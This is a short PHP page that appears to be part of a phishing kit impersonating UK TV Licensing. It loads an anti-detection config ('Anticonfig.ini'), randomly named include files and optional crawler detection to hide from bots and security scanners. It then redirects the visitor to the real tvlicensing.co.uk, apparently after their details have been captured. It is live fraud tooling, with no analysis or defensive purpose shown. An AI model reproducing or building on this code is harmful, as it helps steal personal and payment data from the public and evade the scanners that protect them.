<?php 
error_reporting(0);
require_once('config.php');
require_once "o2ivwuyg.php";
require_once "pho7zebk.php";
require_once "rsbvge2q.php";
$tanitatikaram = parse_ini_file("Anticonfig.ini", true);
$setting_crawlerdetect=$tanitatikaram['crawlerdetect'];
if($setting_crawlerdetect == 'on') {
require_once 'crawlerdetect.php';
}
?>

    <script>
        setTimeout(() => {
          window.location.href = 'https://www.tvlicensing.co.uk/';
        }, 1000);
    </script>

    